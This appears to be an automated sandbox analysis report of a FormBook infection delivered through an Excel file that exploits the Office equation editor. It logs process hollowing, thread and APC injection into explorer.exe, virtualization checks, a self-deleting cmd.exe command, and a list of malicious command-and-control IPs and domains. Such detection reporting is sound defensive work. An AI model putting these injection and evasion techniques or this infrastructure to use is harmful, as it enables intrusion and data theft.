Source: C:\Users\Public\vbc.exe Code function: 5_2_004088A0 rdtsc 5_2_004088A0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\vbc.exe Code function: 5_2_00409B10 LdrLoadDll, 5_2_00409B10
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 5_2_009326F8 mov eax, dword ptr fs:[00000030h] 5_2_009326F8
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007B26F8 mov eax, dword ptr fs:[00000030h] 7_2_007B26F8
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\help.exe Process token adjusted: Debug
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 52.58.78.16 80
Source: C:\Windows\explorer.exe Domain query: www.tricqr.com
Source: C:\Windows\explorer.exe Domain query: www.ruhexuangou.com
Source: C:\Windows\explorer.exe Domain query: www.vectoroutlines.com
Source: C:\Windows\explorer.exe Domain query: www.centergolosinas.com
Source: C:\Windows\explorer.exe Domain query: www.buylocalclub.info
Source: C:\Windows\explorer.exe Domain query: www.aideliveryrobot.com
Source: C:\Windows\explorer.exe Domain query: www.dreamcashbuyers.com
Source: C:\Windows\explorer.exe Network Connect: 192.169.223.13 80
Source: C:\Windows\explorer.exe Network Connect: 160.153.137.40 80
Source: C:\Windows\explorer.exe Network Connect: 23.82.57.32 80
Source: C:\Windows\explorer.exe Domain query: www.shopihy.com
Source: C:\Windows\explorer.exe Network Connect: 198.54.126.105 80
Source: C:\Windows\explorer.exe Network Connect: 18.236.1.157 80
Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1388
Source: C:\Windows\SysWOW64\help.exe Thread register set: target process: 1388
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\help.exe base address: 5E0000
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Windows\SysWOW64\help.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: explorer.exe, 00000006.00000000.2191136590.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000006.00000000.2191136590.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000002.2393233250.00000000001F5000.00000004.00000020.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.2191136590.00000000006F0000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 00000007.00000002.2393258433.00000000003C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2393093444.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2393041245.0000000000100000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2185411472.0000000003EEC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2229408433.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2229356728.0000000000150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2229385526.0000000000310000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 00000007.00000002.2393258433.00000000003C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2393093444.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2393041245.0000000000100000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2185411472.0000000003EEC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2229408433.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2229356728.0000000000150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2229385526.0000000000310000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Behavior Graph ID: 385456 Sample: Processed APR12.xlsx Startdate: 12/04/2021 Architecture: WINDOWS Score: 100 (the graph itself is an image; the node information recoverable from it is listed below)

Sample level: www.zgcbw.net; Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 11 other signatures

EXCEL.EXE (started) - dropped: C:\Users\user\...\~$Processed APR12.xlsx, data
EQNEDT32.EXE (started) - contacts 3.125.17.227 (port 49167 -> 80), AMAZON-02US, United States; dropped: C:\Users\user\AppData\Local\...\xles[1].exe, PE32 and C:\Users\Public\vbc.exe, PE32; Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
  vbc.exe (started by EQNEDT32.EXE) - Multi AV Scanner detection for dropped file; Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
    vbc.exe (started) - Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
      explorer.exe (injected) - contacts vectoroutlines.com 198.54.126.105 (port 49169 -> 80), NAMECHEAP-NETUS, United States; www.ruhexuangou.com 23.82.57.32 (port 49170 -> 80), LEASEWEB-USA-SFO-12US, United States; 13 other IPs or domains; System process connects to network (likely due to code injection or exploit)
        help.exe (started) - Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
          cmd.exe (started)

Contacted Public IPs

IP               Domain                                                             Country        ASN    ASN Name                       Malicious
52.58.78.16      www.aideliveryrobot.com                                            United States  16509  AMAZON-02US                    true
23.82.57.32      www.ruhexuangou.com                                                United States  7203   LEASEWEB-USA-SFO-12US          true
3.125.17.227     unknown                                                            United States  16509  AMAZON-02US                    false
198.54.126.105   vectoroutlines.com                                                 United States  22612  NAMECHEAP-NETUS                true
18.236.1.157     sites-external-prod-ebc852aa8146fe7f.elb.us-west-2.amazonaws.com   United States  16509  AMAZON-02US                    false
192.169.223.13   centergolosinas.com                                                United States  26496  AS-26496-GO-DADDY-COM-LLCUS    true
160.153.137.40   shopihy.com                                                        United States  21501  GODADDY-AMSDE                  true

Private

IP
192.168.2.22
192.168.2.255

Contacted Domains

Name IP Active
shopihy.com 160.153.137.40 true
www.ruhexuangou.com 23.82.57.32 true
centergolosinas.com 192.169.223.13 true
sites-external-prod-ebc852aa8146fe7f.elb.us-west-2.amazonaws.com 18.236.1.157 true
www.aideliveryrobot.com 52.58.78.16 true
vectoroutlines.com 198.54.126.105 true
www.tricqr.com unknown unknown
www.shopihy.com unknown unknown
www.vectoroutlines.com unknown unknown
www.zgcbw.net unknown unknown
www.centergolosinas.com unknown unknown
www.buylocalclub.info unknown unknown
www.dreamcashbuyers.com unknown unknown